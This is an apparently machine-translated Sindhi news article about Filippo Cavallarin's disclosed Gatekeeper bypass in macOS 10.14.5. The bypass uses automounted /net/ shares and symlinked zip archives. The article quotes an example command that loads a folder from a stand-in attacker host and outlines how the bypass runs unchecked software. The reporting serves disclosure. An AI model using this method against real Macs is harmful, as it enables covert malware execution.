اميا تومان سيڪيورٽي محقق فلپو ڪيوالرين پنهنجي بلاگ تي macOS 10.14.5 ۾ بگ بابت خبردار ڪيو. اهو مڪمل طور تي گيٽ ڪيپر جي حفاظتي قدمن کي نظرانداز ڪرڻ جي امڪان تي مشتمل آهي. Cavallarin جي مطابق، هن هن سال جي فيبروري ۾ اڳ ۾ ئي ايپل کي غلطي جي نشاندهي ڪئي، پر ڪمپني ان کي تازو اپڊيٽ ۾ درست نه ڪيو.
گيٽ ڪيپر ايپل پاران تيار ڪيو ويو ۽ 2012 ۾ پهريون ڀيرو ان جي ڊيسڪ ٽاپ آپريٽنگ سسٽم ۾ شامل ڪيو ويو. اهو هڪ ميڪانيزم آهي جيڪو صارف جي ڄاڻ ۽ رضامندي کان سواء ايپليڪيشن کي هلائڻ کان روڪي ٿو. توهان هڪ ايپ ڊائون لوڊ ڪرڻ کان پوء، گيٽ ڪيپر خودڪار طريقي سان ان جو ڪوڊ چيڪ ڪري ٿو ته ڇا سافٽ ويئر ايپل طرفان صحيح طور تي دستخط ٿيل آهي.
ٿي سگهي ٿو توهان جي دلچسپي
هن جي بلاگ پوسٽ ۾، ڪيلارين چيو آهي ته گيٽ ڪيپر، ڊفالٽ طور، ٻنهي خارجي اسٽوريج ۽ نيٽ ورڪ شيئرز کي محفوظ هنڌن تي سمجهي ٿو. ڪنهن به ايپليڪيشن جيڪا انهن مقصدن ۾ رهي ٿي، تنهن ڪري خودڪار طور تي شروع ٿي سگهي ٿي بغير گيٽ ڪيپر چيڪ ذريعي وڃڻ جي. اها اها خاصيت آهي جنهن کي استعمال ڪري سگهجي ٿو بدسلوڪي سافٽ ويئر لانچ ڪرڻ لاءِ صارف جي ڄاڻ کان سواءِ.
ھڪڙو پاسو جيڪو غير مجاز رسائي جي اجازت ڏئي ٿو آٽوماؤنٽ خصوصيت آھي، جيڪا صارفين کي خودڪار طريقي سان ھڪڙي نيٽ ورڪ شيئر کي صرف "/net/" سان شروع ٿيندڙ ھڪڙي رستي جي وضاحت ڪرڻ جي اجازت ڏئي ٿي. مثال طور، Cavallarin رستو بيان ڪري ٿو "ls /net/evil-attacker.com/sharedfolder/" جيڪو آپريٽنگ سسٽم کي "شيئر فولڊر" فولڊر جي مواد کي ريموٽ هنڌ تي لوڊ ڪري سگھي ٿو جيڪو ممڪن طور تي بدسلوڪي ٿي سگهي ٿو.
توهان وڊيو ۾ خطري جي ڪم جو طريقو ڏسي سگهو ٿا:
هڪ ٻيو عنصر حقيقت اها آهي ته جيڪڏهن هڪ زپ آرڪائيو جنهن ۾ هڪ مخصوص سملنک شامل آهي آٽو مائونٽ فنڪشن جي اڳواڻي ۾ حصيداري ڪئي وئي آهي، اهو گيٽ ڪيپر طرفان چيڪ نه ڪيو ويندو. هن طريقي سان، مقتول آساني سان بدسلوڪي آرڪائيو کي ڊائون لوڊ ڪري سگهي ٿو ۽ ان کي زپ ڪري سگهي ٿو، حملي ڪندڙ کي اجازت ڏئي ٿو ته صارف جي ڄاڻ کان سواء ميڪ تي عملي طور تي ڪنهن به سافٽ ويئر کي هلائڻ لاء. فائنر، جيڪو ڊفالٽ طور تي ڪجهه واڌارن کي لڪائيندو آهي، ان ۾ پڻ هن نقصان جو حصو آهي.
ڪيلارين پنهنجي بلاگ تي ٻڌائي ٿو ته ايپل هن سال 22 فيبروري تي MacOS آپريٽنگ سسٽم جي ڪمزوري ڏانهن ڌيان ڏنو. پر مئي جي وچ ۾، ايپل ڪيولرين سان رابطو ڪرڻ بند ڪيو، تنهن ڪري ڪيولرين فيصلو ڪيو ته سڄي شيء کي عام ڪرڻ.
ذريعو: ايف سي وي ايل
